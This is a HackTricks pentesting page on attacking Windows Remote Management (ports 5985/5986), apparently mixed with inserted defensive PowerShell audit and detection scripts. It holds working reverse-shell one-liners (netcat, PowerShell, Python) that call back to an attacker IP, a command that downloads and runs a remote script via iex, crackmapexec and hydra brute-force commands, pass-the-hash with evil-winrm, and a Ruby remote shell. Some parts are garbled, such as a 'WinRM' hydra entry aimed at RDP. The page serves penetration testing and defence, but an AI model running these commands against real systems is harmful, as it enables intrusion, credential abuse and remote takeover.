hacktricks/network-services-pentesting/5985-5986-pentesting-winrm.md
2024-02-11 02:13:58 +00:00


5985,5986 - Pentesting WinRM


WinRM

Windows Remote Management (WinRM) is a Microsoft protocol that enables remote management of Windows systems over HTTP(S), using SOAP for the exchange. On the backend it uses WMI, so it can be seen as an HTTP-based interface for WMI operations.

The presence of WinRM on a machine allows direct remote administration through PowerShell, much as SSH does for other operating systems. To determine whether WinRM is running, check whether these specific ports are open:

  • 5985/tcp (HTTP)
  • 5986/tcp (HTTPS)

An open port from the list above shows that WinRM has been set up, so an attempt to start a remote session can be made.

Starting a WinRM session

To enable PowerShell for WinRM, Microsoft's Enable-PSRemoting cmdlet is used; it configures the computer to accept remote PowerShell commands. From an elevated PowerShell, the following commands enable this functionality and mark every host as trusted:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *

This approach adds a wildcard to the trustedhosts configuration, a step that needs careful consideration because of its implications: the client will then send credentials to any host it is pointed at, without Kerberos mutual authentication. It is also noted that it may be necessary to change the network type from "Public" to "Work" on the attacker's machine.

Furthermore, WinRM can be enabled remotely with the wmic command, as shown below:

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

This method allows remote configuration of WinRM, extending the ability to manage Windows machines remotely.
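As an added example (not code from the HackTricks page), the following PowerShell function audits the local WinRM configuration for the settings this section touches: a wildcard in TrustedHosts, unencrypted or Basic-auth service settings, and which listeners are bound. The function name, the severity labels and the set of checks are my own; the WSMan: provider paths are the standard ones the WinRM provider exposes.

```powershell
# Added example, not part of the original page: audit the local WinRM client and
# service configuration for the settings that make remoting risky.
function Get-WinRMConfigAudit {
    [CmdletBinding()]
    param()

    $findings = [System.Collections.Generic.List[object]]::new()

    # Helper that records one finding; the severity labels are my own convention.
    function Add-Finding([string]$Setting, $Value, [string]$Severity, [string]$Note) {
        $findings.Add([pscustomobject]@{
            Setting  = $Setting
            Value    = $Value
            Severity = $Severity
            Note     = $Note
        })
    }

    # 1. Client TrustedHosts: a wildcard means the client will hand credentials to
    #    any host it is pointed at, with no Kerberos mutual authentication.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    if ([string]::IsNullOrEmpty($trusted)) {
        Add-Finding 'Client\TrustedHosts' '<empty>' 'Info' 'No non-Kerberos targets are trusted.'
    } elseif ($trusted -match '\*') {
        Add-Finding 'Client\TrustedHosts' $trusted 'High' 'Wildcard: every host this client connects to is trusted.'
    } else {
        Add-Finding 'Client\TrustedHosts' $trusted 'Medium' 'Explicit non-Kerberos hosts; confirm each one is intended.'
    }

    # 2. Service settings that weaken transport or authentication.
    $unencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
    $sev = if ($unencrypted -eq 'true') { 'High' } else { 'Info' }
    Add-Finding 'Service\AllowUnencrypted' $unencrypted $sev 'Allows SOAP traffic without message-level encryption.'

    $basic = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value
    $sev = if ($basic -eq 'true') { 'High' } else { 'Info' }
    Add-Finding 'Service\Auth\Basic' $basic $sev 'Basic auth transmits the password itself; only acceptable over HTTPS.'

    # 3. Listeners: which transport, address and port WinRM is bound to.
    foreach ($listener in Get-ChildItem WSMan:\localhost\Listener) {
        $props = @{}
        foreach ($p in Get-ChildItem $listener.PSPath) { $props[$p.Name] = $p.Value }
        $sev = if ($props.Transport -eq 'HTTP' -and $props.Address -eq '*') { 'Medium' } else { 'Info' }
        $bound = '{0} {1}:{2}' -f $props.Transport, $props.Address, $props.Port
        Add-Finding "Listener\$($listener.Name)" $bound $sev 'HTTP on every address is the default after Enable-PSRemoting.'
    }

    $findings
}

# Usage from an elevated PowerShell on the host being audited:
# Get-WinRMConfigAudit | Sort-Object Severity | Format-Table -AutoSize
```

Running this right after the two commands above will show the TrustedHosts finding at High severity, which is the quickest way to confirm the wildcard was removed again once the assessment is over.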

Check if configured

To verify the setup of your attack machine, the Test-WSMan command is used to check whether the target has WinRM configured properly. Running it, you should expect to receive details about the protocol version and wsmid, indicating a successful configuration. Below are examples showing the expected output for a configured target versus an unconfigured one:

  • For a target that is properly configured, the output will look similar to this:
Test-WSMan <target-ip>

The response will contain information about the protocol version and wsmid, indicating that WinRM is set up correctly.

  • Conversely, for a target not configured for WinRM, no such detailed information is returned, indicating the absence of a proper WinRM setup.
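The port check from the first section and the Test-WSMan probe above can be combined into one inventory function. This is an added example and not part of the original page; Get-WinRMExposure, its parameters and the result fields are my own naming. It makes a plain TCP connection to 5985 and 5986, then sends the WS-Management Identify request through Test-WSMan (which needs no credentials) and returns one object per host, so the configured and the unconfigured case from the text both show up in the output instead of as a console error.

```powershell
# Added example, not part of the original page: probe the two WinRM ports and then
# ask the WS-Management service to identify itself with Test-WSMan.
function Get-WinRMExposure {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [int]$TimeoutMs = 2000
    )

    foreach ($target in $ComputerName) {
        $result = [ordered]@{
            ComputerName    = $target
            Port5985        = $false   # HTTP listener
            Port5986        = $false   # HTTPS listener
            WSManReachable  = $false
            ProtocolVersion = $null
            ProductVersion  = $null
            Error           = $null
        }

        # Plain TCP connect with a timeout: an open port only says something is
        # listening, not that it speaks WS-Management.
        foreach ($port in 5985, 5986) {
            $client = [System.Net.Sockets.TcpClient]::new()
            try {
                $connected = $client.ConnectAsync($target, $port).Wait($TimeoutMs)
                $result["Port$port"] = $connected -and $client.Connected
            } catch {
                $result["Port$port"] = $false   # refused, unreachable or timed out
            } finally {
                $client.Dispose()
            }
        }

        # Test-WSMan sends an unauthenticated Identify request. A configured host answers
        # with wsmid, ProtocolVersion and ProductVersion; an unconfigured one raises an
        # error, which -ErrorAction Stop turns into the catch branch below.
        if ($result.Port5985 -or $result.Port5986) {
            $params = @{ ComputerName = $target; ErrorAction = 'Stop' }
            if (-not $result.Port5985) { $params.UseSSL = $true }
            try {
                $id = Test-WSMan @params
                $result.WSManReachable  = $true
                $result.ProtocolVersion = $id.ProtocolVersion
                $result.ProductVersion  = $id.ProductVersion
            } catch {
                $result.Error = $_.Exception.Message
            }
        }

        [pscustomobject]$result
    }
}

# Usage, e.g. against the local machine or a list of hosts you administer:
# Get-WinRMExposure -ComputerName localhost, 'host1.example.local' | Format-Table -AutoSize
```

A host with an open port but WSManReachable set to false is worth a second look: either the listener is bound to a different address, or something other than WinRM is answering on the port.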

Execute commands

To run ipconfig remotely on the target machine and see its output, do the following:

Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]

You can also execute a function from your current PS console via Invoke-Command. Suppose you have a function called enumeration on your machine and want to run it on the remote computer; you can do it like this:

Invoke-Command -ComputerName <computername> -ScriptBlock ${function:enumeration} [-ArgumentList "arguments"]

Execute scripts

To execute a script on a remote Windows machine using WinRM, you can use the Invoke-Command cmdlet in PowerShell. This cmdlet allows you to run commands or scripts on remote computers.

Here is an example of how to execute a script using WinRM:

Invoke-Command -ComputerName <target_ip> -ScriptBlock { <script_content> }

Replace <target_ip> with the IP address of the remote machine and <script_content> with the actual content of your script.

Make sure that WinRM is enabled on the target machine and that you have the necessary permissions to execute scripts remotely.

Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]

Get a reverse shell

To get a reverse shell, you can use the following methods:

Method 1: Netcat

  1. Start a listener on your machine: nc -lvp <port>
  2. Execute the following command on the target machine: nc <your_ip> <port> -e /bin/bash

Method 2: PowerShell

  1. Start a listener on your machine: nc -lvp <port>
  2. Execute the following command on the target machine: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<your_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Method 3: Python

  1. Start a listener on your machine: nc -lvp <port>
  2. Execute the following command on the target machine: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Remember to replace <port> with the desired port number and <your_ip> with your machine's IP address.

Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}

Get a PS session

To get an interactive PowerShell session, use Enter-PSSession:

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds=New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)

The session will run in a new process (wsmprovhost) inside the "victim".
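Because every command executed through Enter-PSSession or Invoke-Command ends up as a child of wsmprovhost.exe on the remote host, that parent/child relationship is the simplest host-side detection for the sessions described above. The following PowerShell is an added example, not from the page: the 4688 records are constructed sample objects carrying the field names of a Security process-creation event, and Get-WinRMChildProcesses and ConvertFrom-ProcessCreationEvent are my own functions.

```powershell
# Added example, not part of the original page: flag processes spawned by the WinRM
# plug-in host (wsmprovhost.exe), which is where remote PowerShell sessions execute.

function ConvertFrom-ProcessCreationEvent {
    # Reduce a Security 4688 record (live or sample) to the fields the rule needs.
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        [pscustomobject]@{
            TimeCreated       = $Event.TimeCreated
            SubjectUserName   = $Event.SubjectUserName
            ParentProcessName = $Event.ParentProcessName
            NewProcessName    = $Event.NewProcessName
            CommandLine       = $Event.CommandLine
        }
    }
}

function Get-WinRMChildProcesses {
    # Every command run through Enter-PSSession / Invoke-Command on the target is a
    # child of wsmprovhost.exe, so the parent image path is the detection key.
    param([Parameter(Mandatory)][object[]]$Events)
    $Events |
        ConvertFrom-ProcessCreationEvent |
        Where-Object { $_.ParentProcessName -match '\\wsmprovhost\.exe$' }
}

# Constructed sample records (not real log data); user names and paths are made up.
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2024-02-11T02:10:00'; SubjectUserName = 'student41'
        ParentProcessName = 'C:\Windows\System32\wsmprovhost.exe'
        NewProcessName    = 'C:\Windows\System32\ipconfig.exe'; CommandLine = 'ipconfig /all' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-02-11T02:10:05'; SubjectUserName = 'student41'
        ParentProcessName = 'C:\Windows\System32\wsmprovhost.exe'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd /c "powershell -ep bypass ..."' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-02-11T02:11:00'; SubjectUserName = 'alice'
        ParentProcessName = 'C:\Windows\explorer.exe'
        NewProcessName    = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe' }
)

Get-WinRMChildProcesses -Events $sampleEvents |
    Format-Table TimeCreated, SubjectUserName, NewProcessName, CommandLine -AutoSize

# On a live host the same rule is fed from the Security log (process-creation auditing
# and command-line logging must be enabled); the EventData fields have to be mapped onto
# the property names used above before piping into Get-WinRMChildProcesses:
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 }
# Session creation itself is recorded by the WinRM provider as event 91 in
# Microsoft-Windows-WinRM/Operational, which gives the session start without a child process.
```

On the sample data the two ipconfig and cmd entries parented by wsmprovhost.exe are reported and the notepad process under explorer.exe is not. Correlating the SubjectUserName with the source address from the matching logon event tells you where the session came from.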

Forcing WinRM open

If you want to use PS Remoting and WinRM but the computer is not configured, you can enable it with:

.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"

Saving and restoring sessions

This will not work if the language is constrained on the remote computer.

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds=New-Object System.Management.Automation.PSCredential(".\student41", $password)

#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1

Inside this session you can load PS scripts using Invoke-Command

Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1

Errors

If you find the following error:

enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.

Try on the client (info from here):

winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'


WinRM connection on linux

Brute Force

Be careful, brute-forcing winrm could lock out users.

#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
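Given the lockout warning above, a defender wants to see brute-force attempts against WinRM as early as possible. This added PowerShell example (not from the page) looks for bursts of failed network logons from one source address using a sliding window; Security event 4625 with logon type 3 is what failed NTLM authentication to the WinRM listener produces on the target host. The event records are constructed samples shaped like the 4625 fields; Find-WinRMAuthFailureBursts, its parameters and the thresholds are my own choices.

```powershell
# Added example, not part of the original page: detect bursts of failed network logons
# (Security 4625, LogonType 3) per source address, the pattern a WinRM brute force leaves.
function Find-WinRMAuthFailureBursts {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$WindowMinutes = 5,   # sliding window length
        [int]$Threshold = 10       # failures inside one window that count as a burst
    )

    $Events |
        Where-Object { $_.Id -eq 4625 -and $_.LogonType -eq 3 } |
        Group-Object IpAddress |
        ForEach-Object {
            $sorted = @($_.Group | Sort-Object TimeCreated)
            $times  = @($sorted.TimeCreated)

            # Sliding window: is there any run of $Threshold consecutive failures whose
            # first and last timestamps are at most $WindowMinutes apart?
            $burst = $false
            for ($i = 0; $i -le $times.Count - $Threshold; $i++) {
                if (($times[$i + $Threshold - 1] - $times[$i]).TotalMinutes -le $WindowMinutes) {
                    $burst = $true
                    break
                }
            }

            [pscustomobject]@{
                SourceAddress = $_.Name
                Failures      = $_.Count
                DistinctUsers = @($sorted.TargetUserName | Sort-Object -Unique).Count
                FirstSeen     = $times[0]
                LastSeen      = $times[-1]
                Burst         = $burst
            }
        }
}

# Constructed sample records (not real log data): one address fails against twelve
# different accounts ten seconds apart, another fails twice half an hour apart.
$base = [datetime]'2024-02-11T02:00:00'
$sampleEvents = @(
    0..11 | ForEach-Object {
        [pscustomobject]@{ Id = 4625; LogonType = 3; IpAddress = '10.10.10.5'
                           TargetUserName = "user$_"; TimeCreated = $base.AddSeconds(10 * $_) }
    }
    [pscustomobject]@{ Id = 4625; LogonType = 3; IpAddress = '10.10.10.9'
                       TargetUserName = 'alice'; TimeCreated = $base.AddMinutes(1) }
    [pscustomobject]@{ Id = 4625; LogonType = 3; IpAddress = '10.10.10.9'
                       TargetUserName = 'alice'; TimeCreated = $base.AddMinutes(30) }
)

Find-WinRMAuthFailureBursts -Events $sampleEvents | Format-Table -AutoSize

# Live use: read 4625 from the Security log and map the EventData fields (IpAddress,
# TargetUserName, LogonType) onto the property names above before calling the function.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 }
```

On the sample data 10.10.10.5 is reported with Burst set to true (twelve failures across twelve accounts in under two minutes, the shape of a password spray), while 10.10.10.9 is listed with two failures and Burst false. Kerberos pre-authentication failures are logged on the domain controller as event 4771 rather than as 4625 on the target, so on domain-joined hosts the same rule should also run against the DC's log.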

Using evil-winrm

Evil-winrm is a powerful tool used in network security assessments to gain access to the WinRM service. It provides a simple way to control and explore Windows systems remotely.

To start, you need to know the IP address of the target system and have network access to it. Then you can use the following command to start a WinRM session:

evil-winrm -i <ip_address> -u <username> -p <password>

Instead of entering the password directly on the command line, you can also use a password file as follows:

evil-winrm -i <ip_address> -u <username> -P <password_file>

After starting the session, you can use evil-winrm commands to perform various operations on the target system. For example, you can view system information with the following command:

sysinfo

You can also run PowerShell commands with the following command:

powershell

Evil-winrm provides a simple way to access the WinRM service and explore Windows systems remotely. It is a useful tool in network security assessments.

gem install evil-winrm

Read the documentation on its github: https://github.com/Hackplayers/evil-winrm

evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>

To connect to an IPv6 address with evil-winrm, create an entry in /etc/hosts that maps a domain name to the IPv6 address and connect to that domain.

Pass the hash with evil-winrm

evil-winrm -u <username> -H <Hash> -i <IP>

Using a PS-docker machine

docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds

Using a ruby script

Code extracted from here: https://alamot.github.io/winrm_shell/

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/

# no_ssl_peer_verification disables certificate validation of the WinRM endpoint
conn = WinRM::Connection.new(
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  :no_ssl_peer_verification => true
)

# Split a command line on whitespace while keeping quoted arguments together,
# then strip surrounding quotes and spaces from each token
class String
  def tokenize
    self.
      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select { |s| not s.empty? }.
      map { |s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/, '') }
  end
end

command = ""
file_manager = WinRM::FS::FileManager.new(conn)

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build and print a prompt from the remote side: user@host dir>
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets || "exit\n"   # treat EOF on stdin as "exit"
    if command.start_with?('UPLOAD') then
      upload_command = command.tokenize
      print("Uploading " + upload_command[1] + " to " + upload_command[2])
      file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print(stdout)
      STDERR.print(stderr)
    end
  end
  puts("Exiting with code #{output.exitcode}")
end

Shodan

  • port:5985 Microsoft-HTTPAPI

HackTricks Automatic Commands

Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Management        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p MySuperSecr3tPass123!

https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binaries from that directory        or -s to upload scripts (sherlock)
menu
invoke-binary `tab`

#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
